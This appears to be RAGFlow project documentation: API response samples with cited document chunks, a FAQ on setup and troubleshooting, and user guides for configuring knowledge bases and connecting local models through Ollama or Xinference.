                        "important_kwd": [],
                        "kb_id": "afab9fdad6e511eebdb20242ac180006",
                        "positions": [
                            [
                                9.0,
                                159.9383341471354,
                                472.1773274739583,
                                223.58013916015625,
                                307.86692301432294
                            ]
                        ],
                        "similarity": 0.7310340654129031,
                        "term_similarity": 0.7671974387781668,
                        "vector_similarity": 0.40556370512552886
                    },
                    {
                        "chunk_id": "7e2345d440383b756670e1b0f43a7007",
                        "content_ltks": "5.5 experiment analysi the main experiment result are tabul in tab . 1 and 2 , showcas the result for closed-sourc and open-sourc llm , respect . the overal perform is calcul a the averag of cllp 8 bert and vit score . here , onli the task descript of the benchmark task are fed into llm(addit inform , such a the input prompt and llm\u2019output , is provid in fig . a.4 and a.5 in supplementari). broadli speak , closed-sourc llm demonstr superior perform on openagi task , with gpt-4 lead the pack under both zero-and few-shot scenario . in the open-sourc categori , llama-2-13b take the lead , consist post top result across variou learn schema--the perform possibl influenc by it larger model size . notabl , open-sourc llm significantli benefit from the tune method , particularli fine-tun and\u2019rltf . these method mark notic enhanc for flan-t5-larg , vicuna-7b , and llama-2-13b when compar with zero-shot and few-shot learn schema . in fact , each of these open-sourc model hit it pinnacl under the rltf approach . conclus , with rltf tune , the perform of llama-2-13b approach that of gpt-3.5 , illustr it potenti .",
                        "content_with_weight": "5.5 Experimental Analysis\nThe main experimental results are tabulated in Tab. 1 and 2, showcasing the results for closed-source and open-source LLMs, respectively. The overall performance is calculated as the average of CLlP\n8\nBERT and ViT scores. Here, only the task descriptions of the benchmark tasks are fed into LLMs (additional information, such as the input prompt and LLMs\u2019 outputs, is provided in Fig. A.4 and A.5 in supplementary). Broadly speaking, closed-source LLMs demonstrate superior performance on OpenAGI tasks, with GPT-4 leading the pack under both zero- and few-shot scenarios. In the open-source category, LLaMA-2-13B takes the lead, consistently posting top results across various learning schema--the performance possibly influenced by its larger model size. Notably, open-source LLMs significantly benefit from the tuning methods, particularly Fine-tuning and\u2019 RLTF. These methods mark noticeable enhancements for Flan-T5-Large, Vicuna-7B, and LLaMA-2-13B when compared with zero-shot and few-shot learning schema. In fact, each of these open-source models hits its pinnacle under the RLTF approach. Conclusively, with RLTF tuning, the performance of LLaMA-2-13B approaches that of GPT-3.5, illustrating its potential.",
                        "doc_id": "c790da40ea8911ee928e0242ac180005",
                        "docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
                        "img_id": "afab9fdad6e511eebdb20242ac180006-7e2345d440383b756670e1b0f43a7007",
                        "important_kwd": [],
                        "kb_id": "afab9fdad6e511eebdb20242ac180006",
                        "positions": [
                            [
                                8.0,
                                107.3,
                                508.90000000000003,
                                686.3,
                                697.0
                            ]
                        ],
                        "similarity": 0.6691508616357027,
                        "term_similarity": 0.6999011754270821,
                        "vector_similarity": 0.39239803751328806
                    }
                ],
                "doc_aggs": [
                    {
                        "count": 8,
                        "doc_id": "c790da40ea8911ee928e0242ac180005",
                        "doc_name": "OpenAGI When LLM Meets Domain Experts.pdf"
                    }
                ],
                "total": 8
            },
            {
                "chunks": [
                    {
                        "chunk_id": "8c11a1edddb21ad2ae0c43b4a5dcfa62",
                        "content_ltks": "nvlink bridg support nvidia\u00aenvlink\u00aei a high-spe point-to-point peer transfer connect , where one gpu can transfer data to and receiv data from one other gpu . the nvidia a100 card support nvlink bridg connect with a singl adjac a100 card . each of the three attach bridg span two pcie slot . to function correctli a well a to provid peak bridg bandwidth , bridg connect with an adjac a100 card must incorpor all three nvlink bridg . wherev an adjac pair of a100 card exist in the server , for best bridg perform and balanc bridg topolog , the a100 pair should be bridg . figur 4 illustr correct and incorrect a100 nvlink connect topolog . nvlink topolog\u2013top view figur 4. correct incorrect correct incorrect for system that featur multipl cpu , both a100 card of a bridg card pair should be within the same cpu domain\u2014that is , under the same cpu\u2019s topolog . ensur thi benefit workload applic perform . the onli except is for dual cpu system wherein each cpu ha a singl a100 pcie card under it;in that case , the two a100 pcie card in the system may be bridg togeth . a100 nvlink speed and bandwidth are given in the follow tabl . tabl 5. a100 nvlink speed and bandwidth paramet valu total nvlink bridg support by nvidia a100 3 total nvlink rx and tx lane support 96 data rate per nvidia a100 nvlink lane(each direct)50 gbp total maximum nvlink bandwidth 600 gbyte per second pb-10137-001_v03|8 nvidia a100 40gb pcie gpu acceler",
                        "content_with_weight": "NVLink Bridge Support\nNVIDIA\u00aeNVLink\u00aeis a high-speed point-to-point peer transfer connection, where one GPU can transfer data to and receive data from one other GPU. The NVIDIA A100 card supports NVLink bridge connection with a single adjacent A100 card.\nEach of the three attached bridges spans two PCIe slots. To function correctly as well as to provide peak bridge bandwidth, bridge connection with an adjacent A100 card must incorporate all three NVLink bridges. Wherever an adjacent pair of A100 cards exists in the server, for best bridging performance and balanced bridge topology, the A100 pair should be bridged. Figure 4 illustrates correct and incorrect A100 NVLink connection topologies.\nNVLink Topology \u2013Top Views \nFigure 4. \nCORRECT \nINCORRECT \nCORRECT \nINCORRECT \nFor systems that feature multiple CPUs, both A100 cards of a bridged card pair should be within the same CPU domain\u2014that is, under the same CPU\u2019s topology. Ensuring this benefits workload application performance. The only exception is for dual CPU systems wherein each CPU has a single A100 PCIe card under it; in that case, the two A100 PCIe cards in the system may be bridged together.\nA100 NVLink speed and bandwidth are given in the following table.\n<table><caption>Table 5. A100 NVLink Speed and Bandwidth </caption>\n<tr><th >Parameter </th><th >Value </th></tr>\n<tr><td >Total NVLink bridges supported by NVIDIA A100 </td><td >3 </td></tr>\n<tr><td >Total NVLink Rx and Tx lanes supported </td><td >96 </td></tr>\n<tr><td >Data rate per NVIDIA A100 NVLink lane (each direction)</td><td >50 Gbps </td></tr>\n<tr><td >Total maximum NVLink bandwidth</td><td >600 Gbytes per second </td></tr>\n</table>\nPB-10137-001_v03 |8\nNVIDIA A100 40GB PCIe GPU Accelerator",
                        "doc_id": "806d1ed0ea9311ee860a0242ac180005",
                        "docnm_kwd": "A100-PCIE-Prduct-Brief.pdf",
                        "img_id": "afab9fdad6e511eebdb20242ac180006-8c11a1edddb21ad2ae0c43b4a5dcfa62",
                        "important_kwd": [],
                        "kb_id": "afab9fdad6e511eebdb20242ac180006",
                        "positions": [
                            [
                                12.0,
                                84.0,
                                541.3,
                                76.7,
                                96.7
                            ]
                        ],
                        "similarity": 0.3200748779905588,
                        "term_similarity": 0.3082244010114718,
                        "vector_similarity": 0.42672917080234146
                    }
                ],
                "doc_aggs": [
                    {
                        "count": 1,
                        "doc_id": "806d1ed0ea9311ee860a0242ac180005",
                        "doc_name": "A100-PCIE-Prduct-Brief.pdf"
                    }
                ],
                "total": 3
            }
        ],
        "update_date": "Tue, 02 Apr 2024 09:07:49 GMT",
        "update_time": 1712020069421
    },
    "retcode": 0,
    "retmsg": "success"
}
```

- **message**: All the chat history is in it.
    - role: user or assistant
    - content: the text content of the user or assistant. The citations are in a format like ##0$$. The number in the middle indicates which item in data.reference.chunks it refers to (see the sketch after this list).

- **user_id**: This is set by the caller.
- **reference**: Every item in it refers to the corresponding message in data.message whose role is assistant.
    - chunks
        - content_with_weight: The content of the chunk.
        - docnm_kwd: the document name.
        - img_id: the image id of the chunk. It is an optional field only for PDF/pptx/picture, accessed by 'GET' /document/get/\<id\>.
        - positions: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
        - similarity: the hybrid similarity.
        - term_similarity: keyword similarity
        - vector_similarity: embedding similarity
    - doc_aggs:
        - doc_id: the document can be accessed by 'GET' /document/get/\<id\>
        - doc_name: the file name
        - count: the chunk number hit in this document.
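A small sketch for resolving those ##N$$ citation markers against the matching reference item, as referenced in the content bullet above (here the marker is swapped for the cited document's name):

```python
import re

def resolve_citations(content, chunks):
    # "##0$$" -> chunks[0] of the reference item paired with this
    # assistant message.
    def repl(m):
        return " [" + chunks[int(m.group(1))]["docnm_kwd"] + "]"
    return re.sub(r"##(\d+)\$\$", repl, content)
```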
|
||||
## Chat
|
||||
|
||||
This will be called to get the answer to users' questions.
|
||||
|
||||
### Path: /api/completion
|
||||
### Method: POST
|
||||
### Parameter:
|
||||
|
||||
| name | type | optional | description|
|
||||
|------|-------|----|----|
|
||||
| conversation_id| string | No | This is from calling /new_conversation.|
|
||||
| messages| json | No | All the conversation history stored here including the latest user's question.|
|
||||
|
||||
### Response
|
||||
```json
|
||||
{
|
||||
"data": {
|
||||
"answer": "The ViT Score for GPT-4 in the zero-shot scenario is 0.5058, and in the few-shot scenario, it is 0.6480. ##0$$",
|
||||
"reference": {
|
||||
"chunks": [
|
||||
{
|
||||
"chunk_id": "d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"content_ltks": "tabl 1:openagi task-solv perform under differ set for three closed-sourc llm . boldfac denot the highest score under each learn schema . metric gpt-3.5-turbo claude-2 gpt-4 zero few zero few zero few clip score 0.0 0.0 0.0 0.2543 0.0 0.3055 bert score 0.1914 0.3820 0.2111 0.5038 0.2076 0.6307 vit score 0.2437 0.7497 0.4082 0.5416 0.5058 0.6480 overal 0.1450 0.3772 0.2064 0.4332 0.2378 0.5281",
|
||||
"content_with_weight": "<table><caption>Table 1: OpenAGI task-solving performances under different settings for three closed-source LLMs. Boldface denotes the highest score under each learning schema.</caption>\n<tr><th rowspan=2 >Metrics</th><th >GPT-3.5-turbo</th><th></th><th >Claude-2</th><th >GPT-4</th></tr>\n<tr><th >Zero</th><th >Few</th><th >Zero Few</th><th >Zero Few</th></tr>\n<tr><td >CLIP Score</td><td >0.0</td><td >0.0</td><td >0.0 0.2543</td><td >0.0 0.3055</td></tr>\n<tr><td >BERT Score</td><td >0.1914</td><td >0.3820</td><td >0.2111 0.5038</td><td >0.2076 0.6307</td></tr>\n<tr><td >ViT Score</td><td >0.2437</td><td >0.7497</td><td >0.4082 0.5416</td><td >0.5058 0.6480</td></tr>\n<tr><td >Overall</td><td >0.1450</td><td >0.3772</td><td >0.2064 0.4332</td><td >0.2378 0.5281</td></tr>\n</table>",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
9.0,
|
||||
159.9383341471354,
|
||||
472.1773274739583,
|
||||
223.58013916015625,
|
||||
307.86692301432294
|
||||
]
|
||||
],
|
||||
"similarity": 0.7310340654129031,
|
||||
"term_similarity": 0.7671974387781668,
|
||||
"vector_similarity": 0.40556370512552886
|
||||
},
|
||||
{
|
||||
"chunk_id": "7e2345d440383b756670e1b0f43a7007",
|
||||
"content_ltks": "5.5 experiment analysi the main experiment result are tabul in tab . 1 and 2 , showcas the result for closed-sourc and open-sourc llm , respect . the overal perform is calcul a the averag of cllp 8 bert and vit score . here , onli the task descript of the benchmark task are fed into llm(addit inform , such a the input prompt and llm\u2019output , is provid in fig . a.4 and a.5 in supplementari). broadli speak , closed-sourc llm demonstr superior perform on openagi task , with gpt-4 lead the pack under both zero-and few-shot scenario . in the open-sourc categori , llama-2-13b take the lead , consist post top result across variou learn schema--the perform possibl influenc by it larger model size . notabl , open-sourc llm significantli benefit from the tune method , particularli fine-tun and\u2019rltf . these method mark notic enhanc for flan-t5-larg , vicuna-7b , and llama-2-13b when compar with zero-shot and few-shot learn schema . in fact , each of these open-sourc model hit it pinnacl under the rltf approach . conclus , with rltf tune , the perform of llama-2-13b approach that of gpt-3.5 , illustr it potenti .",
|
||||
"content_with_weight": "5.5 Experimental Analysis\nThe main experimental results are tabulated in Tab. 1 and 2, showcasing the results for closed-source and open-source LLMs, respectively. The overall performance is calculated as the average of CLlP\n8\nBERT and ViT scores. Here, only the task descriptions of the benchmark tasks are fed into LLMs (additional information, such as the input prompt and LLMs\u2019 outputs, is provided in Fig. A.4 and A.5 in supplementary). Broadly speaking, closed-source LLMs demonstrate superior performance on OpenAGI tasks, with GPT-4 leading the pack under both zero- and few-shot scenarios. In the open-source category, LLaMA-2-13B takes the lead, consistently posting top results across various learning schema--the performance possibly influenced by its larger model size. Notably, open-source LLMs significantly benefit from the tuning methods, particularly Fine-tuning and\u2019 RLTF. These methods mark noticeable enhancements for Flan-T5-Large, Vicuna-7B, and LLaMA-2-13B when compared with zero-shot and few-shot learning schema. In fact, each of these open-source models hits its pinnacle under the RLTF approach. Conclusively, with RLTF tuning, the performance of LLaMA-2-13B approaches that of GPT-3.5, illustrating its potential.",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-7e2345d440383b756670e1b0f43a7007",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
8.0,
|
||||
107.3,
|
||||
508.90000000000003,
|
||||
686.3,
|
||||
697.0
|
||||
]
|
||||
],
|
||||
"similarity": 0.6691508616357027,
|
||||
"term_similarity": 0.6999011754270821,
|
||||
"vector_similarity": 0.39239803751328806
|
||||
}
|
||||
],
|
||||
"doc_aggs": {
|
||||
"OpenAGI When LLM Meets Domain Experts.pdf": 4
|
||||
},
|
||||
"total": 8
|
||||
}
|
||||
},
|
||||
"retcode": 0,
|
||||
"retmsg": "success"
|
||||
}
|
||||
```

- **answer**: The reply of the chat bot.
- **reference**:
  - chunks: Each item in it refers to one of the citations in the answer. Each chunk contains:
    - content_with_weight: The content of the chunk.
    - docnm_kwd: The document name.
    - img_id: The image ID of the chunk. This optional field is present only for PDF, PPTX, and picture files; the image can be accessed by 'GET' /document/get/\<id\>.
    - positions: [page_number, [upleft corner(x, y)], [bottom right(x, y)]]; the position of the chunk, only for PDF.
    - similarity: The hybrid similarity, a weighted combination of the two scores below. In the sample response above, similarity = 0.1 × vector_similarity + 0.9 × term_similarity (for the first chunk: 0.1 × 0.4056 + 0.9 × 0.7672 ≈ 0.7310).
    - term_similarity: The keyword similarity.
    - vector_similarity: The embedding similarity.
  - doc_aggs: Aggregation of the documents hit:
    - doc_id: The document; it can be accessed by 'GET' /document/get/\<id\>.
    - doc_name: The file name.
    - count: The number of chunks hit in this document.

## Get document content or image

This is usually used when displaying the content of a citation.

### Path: /document/get/\<id\>

### Method: GET
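
A minimal sketch of fetching a cited image with curl; `<API_BASE>` is a placeholder for your server's API root, and `<id>` comes from the `img_id` (or `doc_id`) field of the chat response above:

```bash
# Download the image behind a citation; the id is taken from img_id.
curl -o cited_chunk.png "<API_BASE>/document/get/<id>"
```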

**docs/faq.md** (164 lines deleted)

# Frequently Asked Questions

## General

### What sets RAGFlow apart from other RAG products?

The "garbage in garbage out" status quo remains unchanged despite the fact that LLMs have advanced Natural Language Processing (NLP) significantly. In response, RAGFlow introduces two unique features compared to other Retrieval-Augmented Generation (RAG) products.

- Fine-grained document parsing: Document parsing involves images and tables, with the flexibility for you to intervene as needed.
- Traceable answers with reduced hallucinations: You can trust RAGFlow's responses as you can view the citations and references supporting them.

### Which languages does RAGFlow support?

English, simplified Chinese, and traditional Chinese for now.

## Performance

### Why does it take longer for RAGFlow to parse a document than LangChain?

We put painstaking effort into document pre-processing tasks like layout analysis, table structure recognition, and OCR (Optical Character Recognition) using our vision model. This contributes to the additional time required.

## Feature

### Which architectures or devices does RAGFlow support?

Currently, ARM64 and Ascend GPU are not supported.

### Do you offer an API for integration with third-party applications?

These APIs are still in development. Contributions are welcome.

### Do you support stream output?

No, this feature is still in development. Contributions are welcome.

### Is it possible to share dialogue through URL?

This feature and the related APIs are still in development. Contributions are welcome.

### Do you support multiple rounds of dialogues, i.e., referencing previous dialogues as context for the current dialogue?

This feature and the related APIs are still in development. Contributions are welcome.

## Configurations

### How to increase the length of RAGFlow responses?

1. Right-click the desired dialog to display the **Chat Configuration** window.
2. Switch to the **Model Setting** tab and adjust the **Max Tokens** slider to get the desired length.
3. Click **OK** to confirm your change.

### What does Empty response mean? How to set it?

If you specify something in **Empty response**, the system responds with it whenever nothing is retrieved from your knowledge base. If you do not specify anything in **Empty response**, you let your LLM improvise, giving it a chance to hallucinate.

### Can I set the base URL for OpenAI somewhere?



### How to run RAGFlow with a locally deployed LLM?

You can use Ollama to deploy a local LLM. See [here](https://github.com/infiniflow/ragflow/blob/main/docs/ollama.md) for more information.

### How to link up ragflow and ollama servers?

- If RAGFlow is locally deployed, ensure that your RAGFlow and Ollama are in the same LAN.
- If you are using our online demo, ensure that the IP address of your Ollama server is public and accessible.

### How to configure RAGFlow to respond with 100% matched results, rather than utilizing LLM?

1. Click the **Knowledge Base** tab in the middle top of the page.
2. Right-click the desired knowledge base to display the **Configuration** dialogue.
3. Choose **Q&A** as the chunk method and click **Save** to confirm your change.

## Debugging

### How to handle `WARNING: can't find /raglof/rag/res/borker.tm`?

Ignore this warning and continue. All system warnings can be ignored.

### How to handle `Realtime synonym is disabled, since no redis connection`?

Ignore this warning and continue. All system warnings can be ignored.



### Why does it take so long to parse a 2MB document?

Parsing requests have to wait in queue due to limited server resources. We are currently enhancing our algorithms and increasing computing power.

### Why does my document parsing stall at under one percent?

If your RAGFlow is deployed *locally*, try the following:

1. Check the log of your RAGFlow server to see if it is running properly:
```bash
docker logs -f ragflow-server
```
2. Check if the **task_executor.py** process exists.
3. Check if your RAGFlow server can access hf-mirror.com or huggingface.com.

### How to handle `Index failure`?

An index failure usually indicates an unavailable Elasticsearch service.

### How to check the log of RAGFlow?

```bash
tail -f path_to_ragflow/docker/ragflow-logs/rag/*.log
```

### How to check the status of each component in RAGFlow?

```bash
$ docker ps
```
*The system displays the following if all your RAGFlow components are running properly:*

```
5bc45806b680   infiniflow/ragflow:v0.2.0     "./entrypoint.sh"   11 hours ago   Up 11 hours   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp, 0.0.0.0:9380->9380/tcp, :::9380->9380/tcp   ragflow-server
91220e3285dd   docker.elastic.co/elasticsearch/elasticsearch:8.11.3   "/bin/tini -- /usr/l…"   11 hours ago   Up 11 hours (healthy)   9300/tcp, 0.0.0.0:9200->9200/tcp, :::9200->9200/tcp   ragflow-es-01
d8c86f06c56b   mysql:5.7.18   "docker-entrypoint.s…"   7 days ago   Up 16 seconds (healthy)   0.0.0.0:3306->3306/tcp, :::3306->3306/tcp   ragflow-mysql
cd29bcb254bc   quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z   "/usr/bin/docker-ent…"   2 weeks ago   Up 11 hours   0.0.0.0:9001->9001/tcp, :::9001->9001/tcp, 0.0.0.0:9000->9000/tcp, :::9000->9000/tcp   ragflow-minio
```

### How to handle `Exception: Can't connect to ES cluster`?

1. Check the status of your Elasticsearch component:

```bash
$ docker ps
```
*The status of a 'healthy' Elasticsearch component in your RAGFlow should look as follows:*
```
91220e3285dd   docker.elastic.co/elasticsearch/elasticsearch:8.11.3   "/bin/tini -- /usr/l…"   11 hours ago   Up 11 hours (healthy)   9300/tcp, 0.0.0.0:9200->9200/tcp, :::9200->9200/tcp   ragflow-es-01
```

2. If your container keeps restarting, ensure `vm.max_map_count` >= 262144 as per [this README](https://github.com/infiniflow/ragflow?tab=readme-ov-file#-start-up-the-server).

3. If your issue persists, ensure that the ES host setting is correct:

- If you are running RAGFlow with Docker, it is in **docker/service_conf.yml**. Set it as follows:
```
es:
  hosts: 'http://es01:9200'
```
- If you run RAGFlow outside of Docker, verify the ES host setting in **conf/service_conf.yml** using:
```bash
curl http://<IP_OF_ES>:<PORT_OF_ES>
```

### How to handle `{"data":null,"retcode":100,"retmsg":"<NotFound '404: Not Found'>"}`?

Your IP address or port number may be incorrect. If you are using the default configurations, enter http://<IP_OF_YOUR_MACHINE> (**NOT `localhost`, NOT 9380, AND NO PORT NUMBER REQUIRED!**) in your browser. This should work.

**docs/guides/_category_.json** (new file, 8 lines)

```json
{
  "label": "User Guides",
  "position": 2,
  "link": {
    "type": "generated-index",
    "description": "RAGFlow User Guides"
  }
}
```

**docs/guides/configure_knowledge_base.md** (new file, 138 lines)

---
sidebar_position: 1
slug: /configure_knowledge_base
---

# Configure a knowledge base

Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:

- Create a knowledge base
- Configure a knowledge base
- Search for a knowledge base
- Delete a knowledge base

## Create knowledge base

With multiple knowledge bases, you can build more flexible, diversified question answering. To create your first knowledge base:

![create knowledge base](https://github.com/infiniflow/ragflow/assets/93570324/110541ed-6cea-4a03-a11c-414a0948ba80)

_Each time a knowledge base is created, a folder with the same name is generated in the **root/.knowledgebase** directory._

## Configure knowledge base

The following screenshot shows the configuration page of a knowledge base. A proper configuration of your knowledge base is crucial for future AI chats. For example, choosing the wrong embedding model or chunk method would cause unexpected semantic loss or mismatched answers in chats.

![knowledge base configuration](https://github.com/infiniflow/ragflow/assets/93570324/384c671a-8b9c-468c-b1c9-1401128a9b65)

This section covers the following topics:

- Select chunk method
- Select embedding model
- Upload file
- Parse file
- Intervene with file parsing results
- Run retrieval testing

### Select chunk method

RAGFlow offers multiple chunking templates to facilitate chunking files of different layouts and ensure semantic integrity. In **Chunk method**, you can choose the default template that suits the layouts and formats of your files. The following table shows the descriptions and the compatible file formats of each supported chunk template:

| **Template** | Description                                                  | File format                                          |
| ------------ | ------------------------------------------------------------ | ---------------------------------------------------- |
| General      | Files are consecutively chunked based on a preset chunk token number. | DOCX, EXCEL, PPT, PDF, TXT, JPEG, JPG, PNG, TIF, GIF |
| Q&A          |                                                              | EXCEL, CSV/TXT                                       |
| Manual       |                                                              | PDF                                                  |
| Table        |                                                              | EXCEL, CSV/TXT                                       |
| Paper        |                                                              | PDF                                                  |
| Book         |                                                              | DOCX, PDF, TXT                                       |
| Laws         |                                                              | DOCX, PDF, TXT                                       |
| Presentation |                                                              | PDF, PPTX                                            |
| Picture      |                                                              | JPEG, JPG, PNG, TIF, GIF                             |
| One          | The entire document is chunked as one.                       | DOCX, EXCEL, PDF, TXT                                |

You can also change the chunk template for a particular file on the **Datasets** page.

![change chunk method](https://github.com/infiniflow/ragflow/assets/93570324/ac116353-2793-42b2-b181-65e7082bed42)

### Select embedding model

An embedding model builds vector indexes on file chunks. Once you have chosen an embedding model and used it to parse a file, you are no longer allowed to change it. To switch to a different embedding model, you *must* delete all completed file chunks in the knowledge base. The obvious reason is that we must *ensure* that all files in a specific knowledge base are parsed using the *same* embedding model (that is, that they are compared in the same embedding space).

The following embedding models can be deployed locally:

- BAAI/bge-large-zh-v1.5
- BAAI/bge-base-en-v1.5
- BAAI/bge-large-en-v1.5
- BAAI/bge-small-en-v1.5
- BAAI/bge-small-zh-v1.5
- jinaai/jina-embeddings-v2-base-en
- jinaai/jina-embeddings-v2-small-en
- nomic-ai/nomic-embed-text-v1.5
- sentence-transformers/all-MiniLM-L6-v2
- maidalun1020/bce-embedding-base_v1

### Upload file

- RAGFlow's **File Management** allows you to link a file to multiple knowledge bases, in which case each target knowledge base holds a reference to the file.
- In **Knowledge Base**, you are also given the option of uploading a single file or a folder of files (bulk upload) from your local machine to a knowledge base, in which case the knowledge base holds file copies.

While uploading files directly to a knowledge base seems more convenient, we *highly* recommend uploading files to **File Management** and then linking them to the target knowledge bases. This way, you can avoid permanently deleting files uploaded to the knowledge base.

### Parse file

File parsing is a crucial topic in knowledge base configuration. The meaning of file parsing in RAGFlow is twofold: chunking files based on file layout and building embedding and full-text (keyword) indexes on these chunks. After having selected the chunk method and embedding model, you can start parsing a file:

![file parsing](https://github.com/infiniflow/ragflow/assets/93570324/5311f166-6426-447f-aa1f-bd488f1cfc7b)

- Click the play button next to **UNSTART** to start file parsing.
- If your file parsing stalls for a long time, click the red-cross icon and then refresh.
- As shown above, RAGFlow allows you to use a different chunk method for a particular file, offering flexibility beyond the default method.
- As shown above, RAGFlow allows you to enable or disable individual files, offering finer control over knowledge base-based AI chats.

### Intervene with file parsing results

RAGFlow features visibility and explainability, allowing you to view the chunking results and intervene where necessary. To do so:

1. Click on the file that has completed file parsing to view the chunking results:

_You are taken to the **Chunk** page:_

![chunks](https://github.com/infiniflow/ragflow/assets/93570324/0547fd0e-e71b-41f8-8e0e-31649c85fd3d)

2. Hover over each snapshot for a quick view of each chunk.

3. Double-click the chunked texts to add keywords or make *manual* changes where necessary:

![update chunk](https://github.com/infiniflow/ragflow/assets/93570324/1d84b408-4e9f-46fd-9413-8c1059bf9c76)

4. In Retrieval testing, ask a quick question in **Test text** to double-check if your configurations work:

_As you can tell from the following, RAGFlow responds with truthful citations._

![retrieval test](https://github.com/infiniflow/ragflow/assets/93570324/c03f06f6-f41f-4b20-a97e-ae405d3a950c)

### Run retrieval testing

RAGFlow uses multiple recall of both full-text search and vector search in its chats. Prior to setting up an AI chat, consider adjusting the following parameters to ensure that the intended information always turns up in answers:

- Similarity threshold: Chunks with similarities below the threshold will be filtered out. The default is 0.2.
- Vector similarity weight: The percentage by which vector similarity contributes to the overall score. The default is 0.3, which makes a chunk's hybrid score roughly 0.3 × vector similarity + 0.7 × keyword similarity.

![retrieval testing](https://github.com/infiniflow/ragflow/assets/93570324/c03f06f6-f41f-4b20-a97e-ae405d3a950c)

## Search for knowledge base

As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.

![search knowledge base](https://github.com/infiniflow/ragflow/assets/93570324/836ae94c-2438-42be-879e-c7ad2a59693e)

## Delete knowledge base

You are allowed to delete a knowledge base. Hover your mouse over the three-dot icon of the intended knowledge base card and the **Delete** option appears. Once you delete a knowledge base, the associated folder under the **root/.knowledgebase** directory is AUTOMATICALLY REMOVED. The consequences are:

- The files uploaded directly to the knowledge base are gone;
- The file references, which you created from within **File Management**, are gone, but the associated files still exist in **File Management**.

![delete knowledge base](https://github.com/infiniflow/ragflow/assets/93570324/fec7a508-6cfe-4bca-af90-81d3fdb2043c)

**docs/guides/deploy_local_llm.md** (new file, 283 lines)

---
sidebar_position: 5
slug: /deploy_local_llm
---

# Deploy a local LLM

RAGFlow supports deploying models locally using Ollama or Xinference. If you have locally deployed models to leverage or wish to enable GPU or CUDA for inference acceleration, you can bind Ollama or Xinference into RAGFlow and use either of them as a local "server" for interacting with your local models.

RAGFlow seamlessly integrates with Ollama and Xinference, without the need for further environment configurations. You can use them to deploy two types of local models in RAGFlow: chat models and embedding models.

:::tip NOTE
This user guide does not intend to cover much of the installation or configuration details of Ollama or Xinference; its focus is on configurations inside RAGFlow. For the most current information, you may need to check out the official site of Ollama or Xinference.
:::

## Deploy a local model using Ollama

[Ollama](https://github.com/ollama/ollama) enables you to run open-source large language models that you deployed locally. It bundles model weights, configurations, and data into a single package, defined by a Modelfile, and optimizes setup and configurations, including GPU usage.

:::note
- For information about downloading Ollama, see [here](https://github.com/ollama/ollama?tab=readme-ov-file#ollama).
- For information about configuring Ollama server, see [here](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server).
- For a complete list of supported models and variants, see the [Ollama model library](https://ollama.com/library).
:::

To deploy a local model, e.g., **Llama3**, using Ollama:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 11434. For example:

```bash
sudo ufw allow 11434/tcp
```
### 2. Ensure Ollama is accessible

Restart your system, then use curl or your web browser to check whether the Ollama service at `http://localhost:11434` is accessible:

```bash
$ curl http://localhost:11434
Ollama is running
```

### 3. Run your local model

```bash
ollama run llama3
```
<details>
<summary>If your Ollama is installed through Docker, run the following instead:</summary>

```bash
docker exec -it ollama ollama run llama3
```
</details>

### 4. Add Ollama

In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Ollama to RAGFlow:

![add ollama](https://github.com/infiniflow/ragflow/assets/93570324/10635088-028b-4b3d-add9-5c5a6e626814)

### 5. Complete basic Ollama settings

In the popup window, complete basic settings for Ollama:

1. Because **llama3** is a chat model, choose **chat** as the model type.
2. Ensure that the model name you enter here *precisely* matches the name of the local model you are running with Ollama.
3. Ensure that the base URL you enter is accessible to RAGFlow.
4. OPTIONAL: Switch on the toggle under **Does it support Vision?** if your model includes an image-to-text model.

:::caution NOTE
- If your Ollama and RAGFlow run on the same machine, use `http://localhost:11434` as base URL.
- If your Ollama and RAGFlow run on the same machine and Ollama is in Docker, use `http://host.docker.internal:11434` as base URL.
- If your Ollama runs on a different machine from RAGFlow, use `http://<IP_OF_OLLAMA_MACHINE>:11434` as base URL.
:::

:::danger WARNING
If your Ollama runs on a different machine, you may also need to set the `OLLAMA_HOST` environment variable to `0.0.0.0` in **ollama.service** (Note that this is *NOT* the base URL):

```bash
Environment="OLLAMA_HOST=0.0.0.0"
```

See [this guide](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server) for more information.
:::

:::caution WARNING
Improper base URL settings will trigger the following error:
```bash
Max retries exceeded with url: /api/chat (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0xffff98b81ff0>: Failed to establish a new connection: [Errno 111] Connection refused'))
```
:::

### 6. Update System Model Settings

Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model:

*You should now be able to find **llama3** in the dropdown list under **Chat model**.*

> If your local model is an embedding model, you should find it under **Embedding model**.

### 7. Update Chat Configuration

Update your chat model accordingly in **Chat Configuration**:

> If your local model is an embedding model, update it on the configuration page of your knowledge base.

## Deploy a local model using Xinference

Xorbits Inference ([Xinference](https://github.com/xorbitsai/inference)) enables you to unleash the full potential of cutting-edge AI models.

:::note
- For information about installing Xinference, see [here](https://inference.readthedocs.io/en/latest/getting_started/).
